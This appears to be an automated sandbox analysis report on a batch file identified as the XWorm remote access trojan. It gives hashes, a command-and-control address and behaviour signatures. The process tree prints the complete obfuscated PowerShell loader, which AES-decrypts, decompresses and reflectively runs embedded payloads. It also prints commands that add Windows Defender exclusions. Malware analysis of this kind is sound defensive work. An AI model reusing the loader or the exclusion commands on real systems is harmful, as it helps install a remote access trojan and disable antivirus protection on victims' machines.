Analysis

  • max time kernel
    42s
  • max time network
    46s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21-06-2024 16:29

General

  • Target

    Fanta.Live.bat

  • Size

    294KB

  • MD5

    1a62623af35e61ebb5cce084602a9de3

  • SHA1

    06c959f0bdb24bb40bad2f1b1608e2ae8f4efd13

  • SHA256

    d9765f4bf067e521fd60ce58dae185d3b2684acc8bb758f2109474a31697a517

  • SHA512

    38721b6b83286bee42c4fae39e36c5c70a36c0e33920ecdb465829542953ab08575c866d2b01166718e7c01e7ab0871f2e6f0acffbdaf9692836d496e74a2f8c

  • SSDEEP

    6144:ZQD9RNujVNSqoQWl4dDUHbWzZIePg+yCeafR/YevM:uD9RcBNL1DUH6zqeP/yZafhYl

Malware Config

Extracted

Family

xworm

C2

super-nearest.gl.at.ply.gg:17835

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fanta.Live.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EjxD+xG7Na85kgGlTssEAc5Xt3CgTxOC1t6l3g3FG9U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ycEEbUWQfAwiVVtAkmIW1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WtZPv=New-Object System.IO.MemoryStream(,$param_var); $hQDqP=New-Object System.IO.MemoryStream; $SROyA=New-Object System.IO.Compression.GZipStream($WtZPv, [IO.Compression.CompressionMode]::Decompress); $SROyA.CopyTo($hQDqP); $SROyA.Dispose(); $WtZPv.Dispose(); $hQDqP.Dispose(); $hQDqP.ToArray();}function execute_function($param_var,$param2_var){ $oAWqJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HLxpC=$oAWqJ.EntryPoint; $HLxpC.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Fanta.Live.bat';$ZKeYE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Fanta.Live.bat').Split([Environment]::NewLine);foreach ($Xhjpq in $ZKeYE) { if ($Xhjpq.StartsWith(':: ')) { $JfogR=$Xhjpq.Substring(3); break; }}$payloads_var=[string[]]$JfogR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:448
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1964
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4160

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    96b7303b3c5d43ea97d4ead95821a029

    SHA1

    ea1ecce72a776cd922b090f28e9d5aaca1b27539

    SHA256

    7e6faa0a80301b4dae2c6d499e68ad269378909cdd2dca17e972ff80d296b40f

    SHA512

    edc84e846ca527e28702bf981482af921d7872af10aad705b4a527921f68bd06ce38d28c6254f4197f4985297500fcecc51a9f3051915345cd2cd474e0dcd288

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vi5h5ney.4pm.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/448-12-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB

  • memory/448-10-0x0000021BFB650000-0x0000021BFB672000-memory.dmp

    Filesize

    136KB

  • memory/448-13-0x0000021BFB680000-0x0000021BFB688000-memory.dmp

    Filesize

    32KB

  • memory/448-14-0x0000021BFD910000-0x0000021BFD94A000-memory.dmp

    Filesize

    232KB

  • memory/448-15-0x0000021BFD970000-0x0000021BFD988000-memory.dmp

    Filesize

    96KB

  • memory/448-45-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB

  • memory/448-44-0x00007FFB9F583000-0x00007FFB9F585000-memory.dmp

    Filesize

    8KB

  • memory/448-43-0x0000021BFE060000-0x0000021BFE06C000-memory.dmp

    Filesize

    48KB

  • memory/448-0-0x00007FFB9F583000-0x00007FFB9F585000-memory.dmp

    Filesize

    8KB

  • memory/448-11-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB

  • memory/1964-30-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB

  • memory/1964-27-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB

  • memory/1964-26-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB

  • memory/1964-16-0x00007FFB9F580000-0x00007FFBA0041000-memory.dmp

    Filesize

    10.8MB